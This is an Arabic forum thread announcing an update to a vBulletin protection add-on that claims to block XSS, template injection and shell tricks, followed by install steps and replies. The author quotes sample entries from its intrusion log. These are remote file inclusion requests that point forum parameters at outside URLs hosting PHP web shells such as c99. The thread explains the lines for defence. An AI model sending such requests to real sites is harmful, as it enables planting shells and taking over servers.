تحديث هاك Issw v 3 حمايه شامله للمنتدي من استغلالات وتحويل الفريق الامني

[كونان2000]

السلام عليكم ورحمة الله وبركاته
الحمد لله على كل شيء
تم القيام باعادة برمجة هاك الحماية وتحديثه
بسبب طلب الكثير من الاخوه لوجود لوحت تحكم خاصه في الهاك تم إضافة لوحت تحكم

وكذالك لمن طلب منع اكواد التحويل لاخر عشر مواضيع او الاهدائات
او الاحصائيات
فد تم تطوير ومنع html لعناويين المواضيع وهذا للتخلص من اكواد التحويل
وتم إضافة خيار لتفعيل منع التحويل او ايقافه
لاصحاب المنتديات التي لاترغب في تفعيل هذي الميزة فيه
كما موضح في الصورة التالية

إضغط على الصورة لرؤيتها بالحجم الطبيعي - شبكة الحاسوب السلفية 712x208.

الخيار الاول : لتشغيل حمايه المنتدي
منع استغلال xss في المنتدي والحمد لله تم تجربة بشكل ناجح
منع حقن التمبلتات اي اختراق الفورم هوم بنسبة 90%
حجب عدة مواقع تساعد على العبث في المنتديات
تطوير للدوال القديمة للتوافق معه السيرفر
منع اكثر اوامر اليونكس وحيل الحقن في الشيل
اظهار المواقع المصابة على سيرفرك ومحاولت استغلالها للدخول على موقعك :1 (79):
الخيار الثاني :
منع اكواد التحويل لاخر عشر مواضيع
والاهداءات والاحصائيات ومسح HTml الخبيث من عنواين الموضوع
تحت التجربة والتطوير
الان نأتي للقسم الاكثر اثارة للموضوع
عند دخولك مجلد sec
افتح الملف logfile_hacker.txt
ستجد اذا تعرض السيرفر او موقعك لعملية اختراق اما بالشيل او اداة سوف يتم تخزينها بالتفصيل

يرجى الانتذار طور الانجاز

 

[كونان2000]

2007-12-11, 05:50:44, 1197370244, 209.67.223.188, p=11575//codebb/lang_select?phpbb_root_path=http://5thw.lchost.co.uk/site/administrator/components/com_jreactions/safe.txt?, libwww-perl/5.808 
2007-12-11, 06:32:22, 1197372742, 203.211.135.147, t=2081//zipndownload.php?pp_path=http://www.cartographia.org/administrator/remote.txt?, libwww-perl/5.808 
2007-12-11, 07:09:46, 1197374986, 211.157.108.187, p=11575//codebb/pass_code.php?phpbb_root_path=http://www.mta.cl/galeria2/galery.txt?, libwww-perl/5.79 
2007-12-11, 09:15:08, 1197382508, 200.102.138.66, t=http://firehash-filez.110mb.com/c99.txt?, Mozilla/3.0 (compatible; Indy Library

)

يرجى الانتذار طور الانجاز

 

[كونان2000]

الان هذه هي ثلاث شيلات سنشرح بالتفصيل احد الاسطر
طبعا الفاصلة تفصل بين كل معلومه ومعلومة

    ,

​

التاريخ والوقت
كود PHP:

2007-12-11, 05:50:44,

​

عدد المحاولات
كود PHP:

1197370244

ايبي الموقع المصااب
كود PHP:

209.67.223.188

الاصابة طبعا تشفرت لاغراض امنيه
كود PHP:

p=11575//codebb/lang_select

​

الاستغلال
كود PHP:

?phpbb_root_path=http://5thw.lchost.co.uk/site/administrator/components/com_jreactions/safe.txt?

​

يرجى الانتذار طور الانجاز

 

[كونان2000]

نوع الاداه او اصدارها بما انو شيل راح يطلع السطر المستخدم اما اذا كان برنامج
يجيب اسمه بعد يعني من وين صدر الامر اذا من متصفح يطلع اسمه
كود PHP:

libwww-perl/5.808

الان شرح التركيب
امسح جميع هاكات لها علاقه في الحمايه او منع xss
اما من ركب هاك الحمايه issw v2
عليه فقط حذف ملف البرودكت
وتركيب المحدث
شرح حذف الهاك
من لوحت تحكم المنتدي === التحكم بالمنتجات product === من جانب المراد حذفة نختار الغاء التثبيت
ومن ثم حذف توابعه
---------------------------------------------------------------------------
التركيب
نرفع مابداخل upload الى المنتدي
نعطي الترخيص 666
logfile_hacker.txt
counter.txt
الان من لوحت تحكم المنتدي قم برفع البرودكت
تم تجربت المنتج على الاصدار
3.6.8

 

[كونان2000]

عذرا الكود السابق لم يظهر

libwww-perl/5.808

​

 

[كونان2000]

انتهي في انتذار ردود مشجعة
​

 

[R.U.N.W.O.R.M]

بارك الله فيك خويا سمير على النقل الطيب
موضوع مهم
في انتظار كل ماهو جديد منك
​

 

[كونان2000]

بارك الله فيك الاخ لمين على الرد المشجع و عن باذن الله سأقوم بوضع دروس باسود و امن و مواقع و السيرفرات
باذن الله
​

 

[jiji 94]

مشكور .........مشكور​

 

[CHOUAIB12]

السلام عليكم

مشكور اخي الشرح الوافي و المتابعة الاكثر من الرائعة

اخي اشتقت اليك كثير اا ان شاء الله تكون بخير

شكراا

 

[** غزال الصحراء **]

بارك الله فيك ​